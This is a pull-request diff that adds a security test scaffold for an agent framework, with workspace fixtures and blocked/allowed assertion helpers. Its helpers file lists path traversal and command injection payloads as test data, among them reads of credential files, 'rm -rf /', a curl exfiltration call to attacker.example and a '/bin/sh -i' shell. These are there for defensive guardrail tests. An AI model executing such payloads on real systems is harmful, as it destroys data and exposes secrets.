Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions tests/security/__init__.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
"""Security test suite for Operator-Use.

Tests in this package verify that security guardrails are enforced
across tool invocations, file system access, and agent context handling.
"""
78 changes: 78 additions & 0 deletions tests/security/conftest.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
"""Shared fixtures for the security test suite."""

import logging
from pathlib import Path
from typing import Generator

import pytest


@pytest.fixture
def tmp_workspace(tmp_path: Path) -> Generator[Path, None, None]:
    """Provide an isolated directory that stands in for an agent workspace.

    A ``workspace`` directory is created beneath pytest's per-test
    ``tmp_path`` and pre-populated with ``files/`` and ``logs/``
    subdirectories.

    Args:
        tmp_path: pytest's built-in per-test temporary directory.

    Yields:
        Path: The root of the freshly created workspace.
    """
    root = tmp_path / "workspace"
    root.mkdir()
    for subdir in ("files", "logs"):
        (root / subdir).mkdir()
    yield root
    # No teardown here: removal of the directory is left to pytest's own
    # management of ``tmp_path``.


@pytest.fixture
def mock_agent_context(tmp_workspace: Path) -> dict:
    """Build a minimal agent context mapping for tool tests.

    Lets individual security tests exercise tools without constructing a
    full agent object.

    Args:
        tmp_workspace: The isolated workspace fixture; stored under the
            ``workspace`` key.

    Returns:
        dict: A mapping with ``workspace``, ``agent_id`` and
        ``permissions`` keys. The permissions grant ``read`` and
        ``write`` and deny ``execute`` and ``network``.
    """
    permissions = {
        "read": True,
        "write": True,
        "execute": False,
        "network": False,
    }
    context = {
        "workspace": tmp_workspace,
        "agent_id": "test-agent-001",
        "permissions": permissions,
    }
    return context


@pytest.fixture
def capture_logs(
    caplog: pytest.LogCaptureFixture,
) -> Generator[pytest.LogCaptureFixture, None, None]:
    """Expose ``caplog`` with capturing lowered to DEBUG for the test.

    The ``caplog.at_level(logging.DEBUG)`` context is held open while the
    test runs (no logger name is passed), so records at DEBUG and above
    are available for inspection.

    Args:
        caplog: pytest's built-in log-capture fixture.

    Yields:
        pytest.LogCaptureFixture: The same ``caplog`` object; inspect
        ``capture_logs.records`` or ``capture_logs.text``.

    Example::

        def test_blocked_action_is_logged(capture_logs):
            trigger_blocked_action()
            assert any("blocked" in r.message.lower() for r in capture_logs.records)
    """
    debug_scope = caplog.at_level(logging.DEBUG)
    with debug_scope:
        yield caplog
126 changes: 126 additions & 0 deletions tests/security/helpers.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@
"""Utilities shared across the security test suite.

Provides payload generators and common assertion helpers so individual
test modules do not need to duplicate attack-string lists or outcome
checks.
"""

from __future__ import annotations

from typing import Callable


# ---------------------------------------------------------------------------
# Payload generators
# ---------------------------------------------------------------------------


def path_traversal_payloads() -> list[str]:
    """Build the list of path traversal attack strings used by the suite.

    The entries are filenames or path fragments intended to be fed to
    file-access guardrails, which are expected to reject them. A new list
    is created on every call, so callers may mutate the result freely.

    Returns:
        list[str]: Eight traversal payloads, in a fixed order.
    """
    payloads: list[str] = []

    # Classic parent-directory climbs, POSIX and Windows separators.
    payloads.append("../../../etc/passwd")
    payloads.append("..\\..\\..\\windows\\system32\\config\\sam")

    # Encoded / obfuscated dot-dot sequences.
    payloads.append("%2e%2e%2f%2e%2e%2fetc%2fpasswd")
    payloads.append("....//....//etc/passwd")

    # Absolute and home-relative targets.
    payloads.append("/etc/shadow")
    payloads.append("~/.ssh/id_rsa")

    # Short climbs towards project-adjacent files.
    payloads.append("../../.env")
    payloads.append("../tests/secret.txt")

    return payloads


def command_injection_payloads() -> list[str]:
    """Build the list of command injection attack strings used by the suite.

    The entries are shell (and one SQL-style) fragments intended to be
    passed as parameters to tools that construct shell commands, which
    are expected to reject them. A new list is created on every call.

    Returns:
        list[str]: Eight injection payloads, in a fixed order.
    """
    payloads: list[str] = []

    # Command chaining via separators, pipes and logical operators.
    payloads.append("; rm -rf /")
    payloads.append("| cat /etc/passwd")
    payloads.append("&& curl http://attacker.example/exfil")

    # Command substitution, backtick and $() forms.
    payloads.append("`whoami`")
    payloads.append("$(id)")

    # Quote break-out in the style of SQL injection.
    payloads.append("'; DROP TABLE users; --")

    # Embedded newline and $IFS-based whitespace evasion.
    payloads.append("\n/bin/sh -i")
    payloads.append("${IFS}cat${IFS}/etc/passwd")

    return payloads


# ---------------------------------------------------------------------------
# Assertion helpers
# ---------------------------------------------------------------------------


def assert_blocked(result: object, *, check: Callable[[object], bool] | None = None) -> None:
    """Assert that a tool result represents a blocked / denied operation.

    Verifies that ``result`` exposes a ``success`` attribute and that it
    is exactly ``False``. Optionally runs an extra callable ``check`` for
    domain-specific validation.

    The checks raise ``AssertionError`` explicitly rather than using
    ``assert`` statements, so they are still enforced when Python runs
    with optimizations enabled (``-O`` / ``PYTHONOPTIMIZE``), which
    strips ``assert`` statements.

    Args:
        result: The return value from a tool invocation.
        check: Optional extra predicate called with ``result``; a falsy
            return value is treated as a failure.

    Raises:
        AssertionError: When ``result`` has no ``success`` attribute,
            when ``success`` is anything other than ``False``, or when
            the optional check returns a falsy value.

    Example::

        result = await tool.ainvoke(path="../../../etc/passwd")
        assert_blocked(result, check=lambda r: "traversal" in (r.error or "").lower())
    """
    if not hasattr(result, "success"):
        raise AssertionError(
            f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}"
        )
    # Identity comparison on purpose: only a literal ``False`` counts as
    # blocked; ``None``, ``0`` or other falsy values do not.
    if result.success is not False:
        raise AssertionError(
            f"Expected operation to be blocked (success=False) but got success={result.success!r}"
        )
    if check is not None and not check(result):
        raise AssertionError(f"Extra check failed for blocked result: {result!r}")


def assert_allowed(result: object, *, check: Callable[[object], bool] | None = None) -> None:
    """Assert that a tool result represents a permitted / successful operation.

    Verifies that ``result`` exposes a ``success`` attribute and that it
    is exactly ``True``. Optionally runs an extra callable ``check`` for
    domain-specific validation.

    The checks raise ``AssertionError`` explicitly rather than using
    ``assert`` statements, so they are still enforced when Python runs
    with optimizations enabled (``-O`` / ``PYTHONOPTIMIZE``), which
    strips ``assert`` statements.

    Args:
        result: The return value from a tool invocation.
        check: Optional extra predicate called with ``result``; a falsy
            return value is treated as a failure.

    Raises:
        AssertionError: When ``result`` has no ``success`` attribute,
            when ``success`` is anything other than ``True``, or when
            the optional check returns a falsy value.

    Example::

        result = await tool.ainvoke(path="safe_file.txt")
        assert_allowed(result, check=lambda r: r.output is not None)
    """
    if not hasattr(result, "success"):
        raise AssertionError(
            f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}"
        )
    # Identity comparison on purpose: only a literal ``True`` counts as
    # allowed; other truthy values do not.
    if result.success is not True:
        # ``error`` is optional on the result, hence the getattr default.
        raise AssertionError(
            f"Expected operation to be allowed (success=True) but got success={result.success!r}, "
            f"error={getattr(result, 'error', None)!r}"
        )
    if check is not None and not check(result):
        raise AssertionError(f"Extra check failed for allowed result: {result!r}")
142 changes: 142 additions & 0 deletions tests/security/test_scaffold.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,142 @@
"""Example security test that validates the scaffold itself.

Serves as the acceptance-criteria "at least one example security test
passes using the scaffold" required by issue #7. It also acts as
living documentation showing how Phase 1 security tests should be
structured.
"""

from pathlib import Path
from typing import NamedTuple

import pytest

from tests.security.helpers import (
assert_allowed,
assert_blocked,
command_injection_payloads,
path_traversal_payloads,
)


# ---------------------------------------------------------------------------
# Minimal stub that mimics the ToolResult interface
# ---------------------------------------------------------------------------


class _StubResult(NamedTuple):
    """Immutable stand-in for a tool result, used only by these tests.

    Carries the ``success`` flag that the assertion helpers inspect, plus
    optional ``output`` and ``error`` strings that default to ``None``.
    """

    # Whether the simulated operation succeeded.
    success: bool
    # Payload of a successful call, if any.
    output: str | None = None
    # Failure description of a denied call, if any.
    error: str | None = None


# ---------------------------------------------------------------------------
# Fixture smoke tests
# ---------------------------------------------------------------------------


def test_tmp_workspace_is_isolated_directory(tmp_workspace: Path) -> None:
    """The workspace fixture yields an existing directory that can be written to."""
    assert tmp_workspace.exists()
    assert tmp_workspace.is_dir()

    # Round-trip a small file to prove the directory is writable.
    marker = tmp_workspace / "sentinel.txt"
    marker.write_text("ok")
    contents = marker.read_text()
    assert contents == "ok"


def test_tmp_workspace_contains_expected_subdirs(tmp_workspace: Path) -> None:
    """The workspace fixture pre-creates the files/ and logs/ subdirectories."""
    for subdir in ("files", "logs"):
        assert (tmp_workspace / subdir).is_dir()


def test_mock_agent_context_keys(mock_agent_context: dict) -> None:
    """The context fixture exposes every key that tools under test rely on."""
    expected = {"workspace", "agent_id", "permissions"}
    missing = expected - set(mock_agent_context.keys())
    assert not missing


def test_mock_agent_context_workspace_is_path(mock_agent_context: dict) -> None:
    """The context's ``workspace`` entry is a ``Path`` that exists on disk."""
    workspace = mock_agent_context["workspace"]
    assert isinstance(workspace, Path)
    assert workspace.exists()


def test_capture_logs_captures_debug_messages(capture_logs) -> None:
    """A DEBUG record emitted during the test shows up in ``capture_logs``."""
    import logging

    needle = "scaffold-debug-sentinel"
    logging.getLogger("operator_use.security.test").debug(needle)
    assert any(needle in record.message for record in capture_logs.records)


# ---------------------------------------------------------------------------
# Helper function tests
# ---------------------------------------------------------------------------


def test_path_traversal_payloads_returns_nonempty_list() -> None:
    """The traversal generator yields one or more payloads, all of them strings."""
    traversal = path_traversal_payloads()
    assert len(traversal) >= 1
    for payload in traversal:
        assert isinstance(payload, str)


def test_path_traversal_payloads_contain_dotdot() -> None:
    """At least one traversal payload uses a ``..`` sequence."""
    dotdot_payloads = [p for p in path_traversal_payloads() if ".." in p]
    assert dotdot_payloads


def test_command_injection_payloads_returns_nonempty_list() -> None:
    """The injection generator yields one or more payloads, all of them strings."""
    injections = command_injection_payloads()
    assert len(injections) >= 1
    for payload in injections:
        assert isinstance(payload, str)


def test_command_injection_payloads_contain_shell_operators() -> None:
    """At least one injection payload contains a common shell operator character."""
    operators = set(";|&`$")
    injections = command_injection_payloads()
    # A payload qualifies when it shares any character with the operator set.
    assert any(not operators.isdisjoint(payload) for payload in injections)


# ---------------------------------------------------------------------------
# assert_blocked / assert_allowed helper tests
# ---------------------------------------------------------------------------


def test_assert_blocked_passes_on_failure_result() -> None:
    """A result with ``success=False`` is accepted by ``assert_blocked``."""
    denied = _StubResult(success=False, error="denied")
    assert_blocked(denied)


def test_assert_blocked_raises_on_success_result() -> None:
    """A result with ``success=True`` makes ``assert_blocked`` raise."""
    succeeded = _StubResult(success=True, output="ok")
    with pytest.raises(AssertionError, match="blocked"):
        assert_blocked(succeeded)


def test_assert_blocked_raises_when_extra_check_fails() -> None:
    """A failing ``check`` predicate makes ``assert_blocked`` raise."""
    denied = _StubResult(success=False, error="denied")

    def reject(_: object) -> bool:
        return False

    with pytest.raises(AssertionError, match="Extra check failed"):
        assert_blocked(denied, check=reject)


def test_assert_allowed_passes_on_success_result() -> None:
    """A result with ``success=True`` is accepted by ``assert_allowed``."""
    succeeded = _StubResult(success=True, output="ok")
    assert_allowed(succeeded)


def test_assert_allowed_raises_on_failure_result() -> None:
    """A result with ``success=False`` makes ``assert_allowed`` raise."""
    denied = _StubResult(success=False, error="denied")
    with pytest.raises(AssertionError, match="allowed"):
        assert_allowed(denied)


def test_assert_allowed_raises_when_extra_check_fails() -> None:
    """A failing ``check`` predicate makes ``assert_allowed`` raise."""
    succeeded = _StubResult(success=True, output="ok")

    def reject(_: object) -> bool:
        return False

    with pytest.raises(AssertionError, match="Extra check failed"):
        assert_allowed(succeeded, check=reject)
2 changes: 1 addition & 1 deletion tests/test_agent.py
Original file line number Diff line number Diff line change
Expand Up @@ -186,7 +186,7 @@ async def test_agent_run_with_tool_call_then_text(tmp_path):

# Register a simple echo tool
from pydantic import BaseModel
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool

class EchoParams(BaseModel):
message: str
Expand Down
2 changes: 1 addition & 1 deletion tests/test_control_center.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
import pytest
from unittest.mock import AsyncMock, MagicMock, patch

from operator_use.agent.tools.builtin.control_center import (
from operator_use.tools.control_center import (
control_center,
_set_plugin_enabled,
_get_plugin_enabled,
Expand Down
2 changes: 1 addition & 1 deletion tests/test_local_agents.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

import pytest

from operator_use.agent.tools.builtin.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents
from operator_use.tools.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents
from operator_use.messages.service import AIMessage


Expand Down
2 changes: 1 addition & 1 deletion tests/test_plugins.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
from operator_use.agent.tools.registry import ToolRegistry
from operator_use.agent.hooks.service import Hooks
from operator_use.agent.hooks.events import HookEvent
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool
from pydantic import BaseModel


Expand Down
2 changes: 1 addition & 1 deletion tests/test_tool_registry.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
from pydantic import BaseModel

from operator_use.agent.tools.registry import ToolRegistry
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool


# --- Helpers ---
Expand Down
Loading
Loading